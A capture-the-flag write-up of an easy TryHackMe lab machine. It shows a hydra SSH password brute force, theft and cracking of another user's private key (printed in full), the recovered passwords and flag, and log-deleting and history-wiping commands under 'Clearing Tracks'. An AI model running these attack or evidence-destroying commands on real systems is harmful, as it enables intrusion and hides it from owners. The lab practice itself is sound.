THM:basicpentestingjt

    URL: https://tryhackme.com/room/basicpentestingjt [Easy]

    Tags:

    ctf nmap enum4linux gobuster dirbuster hydra private-key john ssh2john apache ubuntu privesc sudo

    Reconnaissance

    Description of the room:

    In these set of tasks you’ll learn the following:

    • brute forcing
    • hash cracking
    • service enumeration
    • Linux Enumeration

    The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.

    Credits to Josiah Pierce from Vulnhub.

    Scanning

    Running: nmap

    Ran the following:

    nmap -sC -sV xxx.xxx.xxx.xxx

    Which produced the following output:

    Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-17 23:17 EST
Nmap scan report for 10.10.183.192
Host is up (0.28s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 24.35 seconds

    Also see: nmap.log

    Enumerating Samba Users

    Since Samba is running, we can run:

    /usr/share/enum4linux/enum4linux.pl -a xxx.xxx.xxx.xxx

    This resulted in the following log (truncated for space, key portions kept or full log):

     ======================================================================= 
|    Users on 10.10.145.91 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

    From this, we know we have at least two users: jan, and kay.

    Finding Web Server Folders

    To attempt to find subfolders on the web server, GoBuster was used via:

    gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://xxx.xxx.xxx.xxx/

    This is what allowed us to find the /development folder:

    ===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.183.192/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/17 23:22:47 Starting gobuster in directory enumeration mode
===============================================================

/development          (Status: 301) [Size: 320] [--> http://10.10.183.192/development/]

    Also see: gobuster.log

    Attempting to guess jan SSH password

    Using hydra, we try RockYou passwords over SSH with:

    hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://xxx.xxx.xxx.xxx

    Which resulted in:

    Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-17 23:30:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.183.192:22/
[STATUS] 170.00 tries/min, 170 tries in 00:01h, 14344231 to do in 1406:18h, 16 active
[STATUS] 112.67 tries/min, 338 tries in 00:03h, 14344063 to do in 2121:55h, 16 active
[STATUS] 109.29 tries/min, 765 tries in 00:07h, 14343636 to do in 2187:29h, 16 active
[22][ssh] host: 10.10.183.192   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-17 23:37:48

    This is where we discovered the password: armando for user jan.

    Also see: hydra.log

    Gaining Access

    Privilege Escalation from jan to kay.

    In the process of running Linpeas, we found that user jan had privilege to read user kay’s SSH private key. So, the key was retrieved via:

    cat /home/kay/.ssh/id_rsa

    When attempting to log into the server as Kay via:

    ssh kay@xxx.xxx.xxx.xxx -i ./kay_id_rsa

    We are confronted with a password prompt. The SSH key is password protected.

    Processing Kay’s Private SSH Key

    We can take that private key:

    -----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

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
-----END RSA PRIVATE KEY-----

    We can put that into a format for “John the Ripper”, so that he can crack that password. We can do that by running the ssh2john.py script from here:

    ssh2john.py ./kay_id_rsa > ./kay_id_rsa.hash

    Resulting in the following hash of the private key file, suitable for John The Ripper to extract the key:

    ./kay_rsa_id:$sshng$1$16$6ABA7DE35C{...snip...}edb337116fa6e5ed858

    We then run John the Ripper against it, using a word list:

    john --wordlist=/usr/shared/wordlists/rockyou.txt ./kay_id_rsa.hash

    We ultimately determine the password for the SSH key is: beeswax.

    Once logged in as user kay, we could read the pass.bak file which had the final flag of: heresareallystrongpasswordthatfollowsthepasswordpolicy$$.

    Maintaining Access

    This is a test machine. However, in a Red Team scenario, we could:

    Clearing Tracks

    This is a test machine. However, in a Red Team scenario, we could:

    Delete relevant logs from /var/log/ - although that might draw attention.

    rm -Rf /var/log/*

    Search and replace our IP address in all logs via:

    find /var/log -name "*" -exec sed -i 's/10.10.2.14/127.0.0.1/g' {} \;

    Wipe bash history for any accounts we used via:

    cat /dev/null > /root/.bash_history

    cat /dev/null > /home/kathy/.bash_history

    cat /dev/null > /home/sam/.bash_history

    Summary

    Below is a summary of key findings.

    Name: Value:
    Users jan, kay
    Password for jan armando
    Password for kay SSH key beeswax
    Final flag. heresareallystrongpasswordthatfollowsthepasswordpolicy$$

    Completed: 1/17/2022 @ 8:52p by r0bsec.